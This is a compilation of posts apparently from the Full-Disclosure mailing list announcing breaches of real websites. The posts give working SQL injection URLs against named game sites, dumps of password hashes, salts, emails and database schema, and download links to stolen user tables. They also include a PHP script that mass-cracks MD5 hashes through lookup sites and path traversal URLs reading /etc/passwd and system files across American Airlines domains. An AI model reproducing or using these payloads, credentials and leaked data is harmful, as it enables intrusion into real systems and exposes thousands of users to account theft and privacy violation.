[Full-disclosure] bcwars.com & pokerrpg.com hacked 200k Email and Plain text passwords
Nother game, nother haxed db 2 games pokerrpg.com and bcwars.com over 100k users each admin used plaintext passwords how dumb got in thru sql injection in the forum tried helping the admin fix but dumbass Dadfish kept being a dick so this disclosure is because of him bcwars http://bit.ly/hD6bEE http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip http://www.megaupload.com/?d=P4B30IVR http://depositfiles.com/de/files/u7unbc4vk http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html http://www.zshare.net/download/884416713e3e2044/ http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/ pokerrpg http://bit.ly/hgCGJx http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip http://www.megaupload.com/?d=T41NF4SV http://depositfiles.com/de/files/8qgnt9gll http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html http://www.zshare.net/download/88441668eff79c3a/ http://uploading.com/files/542e651f/tblUsers.sql-poker.zip injection was http://bcwars.com/forum/category/-3' union select concat(id,'',username,':::',password,':::',email) from tblUsers-- - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Washington University Student and Staff Dump
Came across this: http://www.washington.edu/home/peopledir/ I dumped most emails here http://pastebin.com/ALYtW4hA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MD5 "decrypter" PHP Script
I use the word "decrypter" loosely, but it is what the site's
advertising it to be.
So I wrote a PHP script that takes hashes from a database
(columns are as such: id, hash, unhashed)
and checks them against md5-decrypter.com and md5decryption.com
these sites have no captcha protection (and over 4.7mil stored hashes)
http://md5-encryption.com/";, "data[Row][clear]",
$plaintext);
}
if($num !=2){
give_back("http://md5encryption.com/";,
"submit=Encrypt%20It!&word",
$plaintext);
}
}
function fetch_md5($url, $post, $start, $end, $trim, $hash){
$posted_vars = $post . "=" . $hash;
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $posted_vars);
$fetched_page = curl_exec($ch);
curl_close($ch);
unset($ch);
$password = get_string_between($fetched_page, $start, $end);
if(isset($trim) && !empty($trim)){
$password = substr($password, $trim);
}
return $password;
}
function update_plaintext($table_name, $id_field, $row_id, $plaintext,
$dehashed){ //table name, table id field, row id value, the table
plaintext field, the dehashed password
$sql = "update $table_name set $plaintext = '$dehashed' where
$id_field = '$row_id'";
mysql_query($sql);
}
while($row = mysql_fetch_array($result)){
$password1 = fetch_md5("http://md5-decrypter.com/";,
"data[Row][cripted]", "Decrypted text:", "", "21",
$row[$table_hash]);
if(!empty($password1)){
update_plaintext($db_table, $table_id_field,
$row[$table_id_field],
$table_plaintext, $password1);
if($giveback == "1"){
do_except("1", $password1);
}
continue;
}
$password2 = fetch_md5("http://md5decryption.com/";,
"submit=Decrypt%20It!&hash", "Decrypted Text: ", "",
"", $row[$table_hash]);
if(!empty($password2)){
update_plaintext($db_table, $table_id_field,
$row[$table_id_field],
$table_plaintext, $password2);
if($giveback == "1"){
do_except("2", $password2);
}
continue;
}
}
?>
http://pastebin.com/idGqmqAg
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Scrollwars.com & HellRising.com Hacked
Hacked Sites owned by same user. Scrollwars.com users table http://bit.ly/eAgzbC mirror:http://bit.ly/i7pI99 -- Hellrising.com users table part 1: http://bit.ly/dHTOIR part 2: http://bit.ly/eFLLLe part 3: http://bit.ly/ibrspH First site used md5 second site used sha1, ID1 used a weak password just google his sha1 pass to find the real value ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rpgrevolution.com SQL Injection
/home/rpgrev/domains/rpgrevolution.com/public_html/
http://www.rpgrevolution.com/games.php?platform=all&genre=aaa'
union select
1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id
Salted
63217a559a7be4704156457c633c3344,4164d790f0047fc513b66ae1897bd6f2,16bd17aa7cb278c5520b021838a84a97,fe1d2c340c644126ba041bf0e97b7626,4263acb3502f6398ceb3841aa597fc5b,1da97968c870b5e8f4f8bd8897818056,5d9d9fa96b96c6c65b0673574a35453a,3f2e95b48762eb5b05f2424cfa80892a,6be4fb54d289d423ad69d9ef9b644156,731860ca22a89f0892a167f2afc81fa5,0b554ca29560318413f628347f46739b,07f2abe0dd2f40f0645e516f0f99325f,5f6ca10a7f1b0161acec092e4bee3c3c,1f2f49e8cf15428c350d96e2c2657d8b,c3d4f999324da31ee27cded6f9afde82,8787496111945c44e9d1bf62c43f9a40,5eaa772f28ca4c5832b997a6d24eb583,7e0e12c300b74661b6d6af08061d9363,0b2b5b1fb0dd8741328306b11166db63,57701c03e318d9fd39c56770b5f8a690,3dc61c20f521ead4381f02d9e99a0f46,e4a109ad7f09f3592b66c1ff3bce757b,562cd66fb31032973b116c4f5e9d01ac,a1815b2be6045fb98d850b96f0826ea3,d5234683d52606e67c9892c848a27eef,d2944383a1a72ae25b1dc49099ce0fa8,e161df49ddeda84829f2dd450a787632,d5be51ebf16f3768e52ca3ce7dc8372e,4a810955d9c4d9c956c14e8870c88338,615019960314d071fea6c37eaf363dca,
67539a45a48399e929963918277ab37f
Corresponding Salt
lNF@,,av7@e,zm?m/,~>H;<,EKu(h,#Z/q;,q$[Qc,9D.e},C|@;Z,E;hhO,eIG,u,+4Vqb,)p%/},q:Z{T,W'.Tj,THvsH,_f|+g,b[3tA,4%BuP,4n^n6,P(/.e,VliRl,xfA%a,U9Rce,C-JY3,qgoB~,|9P3Q,W],*`,$]S+G,Pz_Fw,:y@/,,5.LMi,>r1d?,krR)@,70=1|,}}~rI,|Hr[f,Xz)Db,KvXc^,h9'F},~J)er,J/QNO,F*I*O,43fh2,B3lLg,r|zjv,:mZ>j,MpLdR,$ScWu,MC7S[,F.LS.,xVToc,#vj?(,(5-R+,E:?p7,<8Mi{,s/%Z8,wb*zC,2W0Ag,H]%~{,68wdx,z3"Q),^Ir#6,girRW,xhd#j,d8`_x,]:9_z,-n3^b,L3z`0,U,~Jy,]{}:^,4+4<`,HdJ?B,uDjFw,%1MZF,q4{-N,w%d/:,9UXJ{,+2up5,V@Xul,L]M/5,G/&Vg,tZBM,Y51Vn,;@TW1,_]^H:,v^'E.,1_:;+,{ovD.,lF"^|,y`:v^,Gd4h|,Ju`/C,1UV/l,1J'*G,0m86q,qq!Xf,]S8h(,GWsR(,g[1PLx,hlu4
mins...@gmail.com,cooldud...@gmail.com,sir.sh...@gmail.com,psychoant...@gmail.com,jcin...@gmail.com,jonathan.pand...@gmail.com,rene...@gmail.com,stepan_...@msn.com,webmas...@mvpmrd.zzn.com,kumiho...@gmail.com,jose...@terra.com.br,r...@mygen24.com,ruze8...@gmail.com,ivan_polanc...@hotmail.com,g...@hipdev.com,diana_sexyl...@hotmail.com,saboor_...@hotmail.com,g...@nana.co.il,unconform...@gmail.com,renat...@gmail.com,xsilverbl...@msn.com,kni...@hotmail.fr,theomen...@hotmail.com,eleve...@mail.com,klein...@gmail.com,nick...@gmail.com,game_boi...@hotmail.com,when_is_...@hotmail.com,tiggerville2...@gmail.com,cyfe...@o2.pl,guardian_dra...@hotmail.com,hitma...@t-online.de,ja...@divinelegy.com,crpri...@telus.net,jelly...@charter.net,jellydude3...@yahoo.com,ultrapokeman...@yahoo.com,nukehun...@hotmail.com,hawkfir...@hotmail.com,kekk...@aliceposta.it,bballt...@verizon.net,zamua...@msn.com,memo...@walla.co.il,quickcutthr...@yahoo.com,drew_samuel...@hotmail.com,cecilvanhels...@gmail.com,fresc
o_dew...@hotmail.com,
access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, --
id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users,
--api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,ibf_arcade_news,ibf_arcade_scoreboard,ibf_arcade_sessions,ibf_arcade_sitngo,ibf_arcade_sitngo_plyers,ibf_arcade_tartemp,ibf_attachments,ibf_attachments_type,ibf_badwords,ibf_banfilters,ibf_bulk_mail,ibf_cache_store,ibf_cal_calendars,ibf_cal_events
ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_chall
[Full-disclosure] jaillords.com hacked, login/password/email list
Weak passwords, no brute force protection, lots of sql injections, was easy to take full control of site Heres the password files http://bit.ly/fpiJAe http://www.multiupload.com/RS_FFZYI7E55X http://www.multiupload.com/MU_FFZYI7E55X http://www.multiupload.com/DF_FFZYI7E55X http://www.multiupload.com/HF_FFZYI7E55X http://www.multiupload.com/ZS_FFZYI7E55X http://www.multiupload.com/UP_FFZYI7E55X http://www.megaupload.com/?d=J4ILN922 http://depositfiles.com/de/files/t7bo8r83f http://hotfile.com/dl/102762685/72d8295/dump_07-02-2011-12-36-26.sql.html http://www.zshare.net/download/862671854c06f092/ http://uploading.com/files/c1a234f8/dump_07-02-2011-12-36-26.sql/ http://rapidshare.com/files/446763555/dump_07-02-2011-12-36-26.sql admins fix ur shit or we will be back ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] American Airlines (multiple domains) Local File Include
American Airlines' domains have been vulnerable to Local file Include (I wonder if anyone has flown free using this) http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p= http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p= http://www.touraa.com/aa/i18nForward.do?p= and some senstive files i found https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts screen shots http://i41.tinypic.com/fcns7t.jpg http://i25.tinypic.com/359z85z.jpg it's been reported and they don't feel like responding (if the page doesn't work try taking off a ../) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
